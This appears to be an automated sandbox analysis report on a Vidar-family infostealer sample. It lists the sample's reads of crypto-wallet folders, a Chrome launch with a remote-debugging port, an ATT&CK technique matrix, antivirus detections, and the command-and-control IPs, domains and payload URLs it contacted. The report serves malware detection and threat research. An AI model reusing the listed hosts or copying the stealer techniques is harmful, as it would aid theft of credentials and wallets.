                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeDirectory queried: C:\Users\user\Documents
                          Source: Yara matchFile source: Process Memory Space: 24da741fb6.exe PID: 1236, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 0d8313073f.exe PID: 4136, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: Yara matchFile source: Process Memory Space: 203f60e481.exe PID: 5300, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 24da741fb6.exe PID: 1236, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 13.2.0d8313073f.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2922718430.0000000000611000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.2559813189.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 0d8313073f.exe PID: 4136, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information111
                          Scripting
                          Valid Accounts21
                          Windows Management Instrumentation
                          111
                          Scripting
                          1
                          DLL Side-Loading
                          411
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services11
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts12
                          Command and Scripting Interpreter
                          1
                          DLL Side-Loading
                          2
                          Bypass User Account Control
                          21
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job
                          1
                          Scheduled Task/Job
                          1
                          Extra Window Memory Injection
                          2
                          Obfuscated Files or Information
                          Security Account Manager12
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared Drive1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts2
                          PowerShell
                          121
                          Registry Run Keys / Startup Folder
                          12
                          Process Injection
                          32
                          Software Packing
                          NTDS256
                          System Information Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          DLL Side-Loading
                          LSA Secrets971
                          Security Software Discovery
                          SSHKeylogging114
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts121
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Account Control
                          Cached Domain Credentials2
                          Process Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Extra Window Memory Injection
                          DCSync371
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Masquerading
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547313 Sample: file.exe Startdate: 02/11/2024 Architecture: WINDOWS Score: 100 98 thumbystriw.store 2->98 100 presticitpo.store 2->100 102 23 other IPs or domains 2->102 126 Suricata IDS alerts for network traffic 2->126 128 Found malware configuration 2->128 130 Antivirus detection for dropped file 2->130 132 22 other signatures 2->132 9 skotes.exe 4 28 2->9         started        14 file.exe 5 2->14         started        16 skotes.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 120 185.215.113.43, 63773, 63787, 63813 WHOLESALECONNECTIONSNL Portugal 9->120 122 185.215.113.16, 63819, 63862, 63898 WHOLESALECONNECTIONSNL Portugal 9->122 124 wasni.care 208.109.77.116, 63794, 63806, 80 SUCURI-SECUS United States 9->124 86 C:\Users\user\AppData\...\8a0ff7e068.exe, PE32 9->86 dropped 88 C:\Users\user\AppData\...\203f60e481.exe, PE32 9->88 dropped 90 C:\Users\user\AppData\...\0d8313073f.exe, PE32 9->90 dropped 96 7 other malicious files 9->96 dropped 170 Creates multiple autostart registry keys 9->170 172 Hides threads from debuggers 9->172 174 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->174 20 24da741fb6.exe 9->20         started        25 0d8313073f.exe 9->25         started        27 8a0ff7e068.exe 9->27         started        33 2 other processes 9->33 92 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->92 dropped 94 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->94 dropped 176 Detected unpacking (changes PE section rights) 14->176 178 Tries to evade debugger and weak emulator (self modifying code) 14->178 180 Tries to detect virtualization through RDTSC time measurements 14->180 182 Potentially malicious time measurement code found 14->182 29 skotes.exe 14->29         started        184 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->184 186 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->186 31 firefox.exe 18->31         started        file6 signatures7 process8 dnsIp9 104 necklacedmny.store 188.114.96.3, 443, 63854, 63867 CLOUDFLARENETUS European Union 20->104 72 C:\Users\...\33QCBA038D3K2VF7AVBGWF5K.exe, PE32 20->72 dropped 144 Antivirus detection for dropped file 20->144 146 Multi AV Scanner detection for dropped file 20->146 148 Query firmware table information (likely to detect VMs) 20->148 162 4 other signatures 20->162 35 33QCBA038D3K2VF7AVBGWF5K.exe 20->35         started        106 185.215.113.206, 63908, 80 WHOLESALECONNECTIONSNL Portugal 25->106 74 C:\Users\user\AppData\...\msvcp140[1].dll, PE32 25->74 dropped 76 C:\Users\user\AppData\...\mozglue[1].dll, PE32 25->76 dropped 78 C:\Users\user\AppData\...\freebl3[1].dll, PE32 25->78 dropped 84 4 other malicious files 25->84 dropped 150 Detected unpacking (changes PE section rights) 25->150 152 Attempt to bypass Chrome Application-Bound Encryption 25->152 154 Machine Learning detection for dropped file 25->154 38 chrome.exe 25->38         started        164 5 other signatures 27->164 166 3 other signatures 29->166 108 youtube.com 142.250.186.110 GOOGLEUS United States 31->108 110 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 31->110 112 5 other IPs or domains 31->112 41 firefox.exe 31->41         started        43 firefox.exe 31->43         started        80 C:\Users\user\AppData\Roaming\DiagTrack.exe, PE32 33->80 dropped 82 C:\Users\user\AppData\...\DiagTrack.vbs, ASCII 33->82 dropped 156 Binary is likely a compiled AutoIt script file 33->156 158 Found many strings related to Crypto-Wallets (likely being stolen) 33->158 160 Drops VBS files to the startup folder 33->160 168 3 other signatures 33->168 45 powershell.exe 23 33->45         started        47 taskkill.exe 33->47         started        49 MSBuild.exe 33->49         started        51 5 other processes 33->51 file10 signatures11 process12 dnsIp13 134 Multi AV Scanner detection for dropped file 35->134 136 Detected unpacking (changes PE section rights) 35->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 35->138 142 5 other signatures 35->142 116 192.168.2.4, 443, 49723, 49724 unknown unknown 38->116 118 239.255.255.250 unknown Reserved 38->118 53 chrome.exe 38->53         started        140 Loading BitLocker PowerShell Module 45->140 56 conhost.exe 45->56         started        58 WmiPrvSE.exe 45->58         started        60 conhost.exe 47->60         started        62 WerFault.exe 49->62         started        64 conhost.exe 51->64         started        66 conhost.exe 51->66         started        68 conhost.exe 51->68         started        70 conhost.exe 51->70         started        signatures14 process15 dnsIp16 114 www.google.com 216.58.212.164 GOOGLEUS United States 53->114

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe53%ReversingLabsWin32.Trojan.Vidar
                          file.exe54%VirustotalBrowse
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Roaming\DiagTrack.exe100%AviraTR/Dropper.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\DiagTrack.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe100%Joe Sandbox ML
                          C:\ProgramData\chrome.dll0%ReversingLabs
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fwkdsz[1].exe18%ReversingLabsByteCode-MSIL.Infostealer.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe37%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe47%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe47%ReversingLabsWin32.Trojan.CredentialFlusher
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe42%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe18%ReversingLabsByteCode-MSIL.Infostealer.Generic
                          C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe42%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe47%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe47%ReversingLabsWin32.Trojan.CredentialFlusher
                          C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe37%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe37%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Trojan.Vidar
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          example.org0%VirustotalBrowse
                          prod.classify-client.prod.webservices.mozgcp.net0%VirustotalBrowse
                          prod.balrog.prod.cloudops.mozgcp.net0%VirustotalBrowse
                          prod.detectportal.prod.cloudops.mozgcp.net0%VirustotalBrowse
                          SourceDetectionScannerLabelLink
                          http://detectportal.firefox.com/0%URL Reputationsafe
                          https://json-schema.org/draft/2019-09/schema.0%URL Reputationsafe
                          https://spocs.getpocket.com/spocs0%URL Reputationsafe
                          https://screenshots.firefox.com0%URL Reputationsafe
                          https://ads.stickyadstv.com/firefox-etp0%URL Reputationsafe
                          https://xhr.spec.whatwg.org/#sync-warning0%URL Reputationsafe
                          https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                          http://exslt.org/common0%URL Reputationsafe
                          https://ok.ru/0%URL Reputationsafe
                          http://win.mail.ru/cgi-bin/sentmsg?mailto=%s0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://MD8.mozilla.org/1/m0%URL Reputationsafe
                          https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=0%URL Reputationsafe
                          https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-1520%URL Reputationsafe
                          https://static.adsafeprotected.com/firefox-etp-js0%URL Reputationsafe
                          https://shavar.services.mozilla.com/0%URL Reputationsafe
                          https://spocs.getpocket.com/0%URL Reputationsafe
                          https://bugzilla.mozilla.org/show_bug.cgi?id=15844640%URL Reputationsafe
                          https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                          https://account.bellmedia.c0%URL Reputationsafe
                          https://login.microsoftonline.com0%URL Reputationsafe
                          https://www.zhihu.com/0%URL Reputationsafe
                          http://x1.c.lencr.org/00%URL Reputationsafe
                          http://x1.i.lencr.org/00%URL Reputationsafe
                          https://infra.spec.whatwg.org/#ascii-whitespace0%URL Reputationsafe
                          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                          https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings20%URL Reputationsafe
                          https://contile.services.mozilla.com/v1/tiles0%URL Reputationsafe
                          https://screenshots.firefox.com/0%URL Reputationsafe
                          https://gpuweb.github.io/gpuweb/0%URL Reputationsafe
                          http://json-schema.org/draft-07/schema#-0%URL Reputationsafe
                          https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-40%URL Reputationsafe
                          https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-20%URL Reputationsafe
                          https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          example.org
                          93.184.215.14
                          truefalseunknown
                          prod.classify-client.prod.webservices.mozgcp.net
                          35.190.72.216
                          truefalseunknown
                          prod.balrog.prod.cloudops.mozgcp.net
                          35.244.181.201
                          truefalseunknown
                          prod.detectportal.prod.cloudops.mozgcp.net
                          34.107.221.82
                          truefalseunknown
                          s-part-0017.t-0009.t-msedge.net
                          13.107.246.45
                          truefalse
                            unknown
                            fp2e7a.wpc.phicdn.net
                            192.229.221.95
                            truefalse
                              unknown
                              contile.services.mozilla.com
                              34.117.188.166
                              truefalse
                                unknown
                                youtube.com
                                142.250.186.110
                                truefalse
                                  unknown
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  34.160.144.191
                                  truefalse
                                    unknown
                                    bg.microsoft.map.fastly.net
                                    199.232.210.172
                                    truefalse
                                      unknown
                                      wasni.care
                                      208.109.77.116
                                      truefalse
                                        unknown
                                        ipv4only.arpa
                                        192.0.0.171
                                        truefalse
                                          unknown
                                          prod.ads.prod.webservices.mozgcp.net
                                          34.117.188.166
                                          truefalse
                                            unknown
                                            www.google.com
                                            216.58.212.164
                                            truefalse
                                              unknown
                                              necklacedmny.store
                                              188.114.96.3
                                              truetrue
                                                unknown
                                                spocs.getpocket.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  detectportal.firefox.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    content-signature-2.cdn.mozilla.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      presticitpo.store
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        thumbystriw.store
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          shavar.services.mozilla.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            171.39.242.20.in-addr.arpa
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              crisiwarny.store
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                fadehairucw.store
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  http://185.215.113.206/true
                                                                    unknown
                                                                    http://wasni.care/panel/uploads/Luvzkkz.mp4false
                                                                      unknown
                                                                      fadehairucw.storetrue
                                                                        unknown
                                                                        http://185.215.113.206/746f34465cf17784/freebl3.dlltrue
                                                                          unknown
                                                                          http://185.215.113.206/746f34465cf17784/mozglue.dlltrue
                                                                            unknown
                                                                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                              unknown
                                                                              navygenerayk.storetrue
                                                                                unknown
                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                http://mozilla.org/#/properties/proposedEnrollmentfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://support.mozilla.org/kb/website-translationresource://gre/modules/DownloadIntegration.sys.mjsfirefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://detectportal.firefox.com/firefox.exe, 00000020.00000002.3278500608.00000253EC09F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://mozilla.org/#/properties/schemaVersionfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/valuefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://wasni.careFwkdsz.exe, 00000007.00000002.2640122155.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUIfirefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://json-schema.org/draft/2019-09/schema.firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://185.215.113.206/6c4adf523b719729.phpser0d8313073f.exe, 0000000D.00000002.2922718430.0000000000724000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                              unknown
                                                                                              http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataTypefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://spocs.getpocket.com/spocsfirefox.exe, 00000020.00000003.2894400947.00000253F6162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://screenshots.firefox.comfirefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://185.215.113.206/746f34465cf17784/mozglue.dlla0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServicefirefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://mozilla.org/#/properties/branchesfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2817267782.00000253F46FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://mozilla.org/#/properties/userFacingNamefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://mozilla.org/#/properties/quickSuggestSponsoredEnabledfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Nofirefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://185.215.113.43/Zu7JuNko/index.phpcodedskotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://185.215.113.206/aqH0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
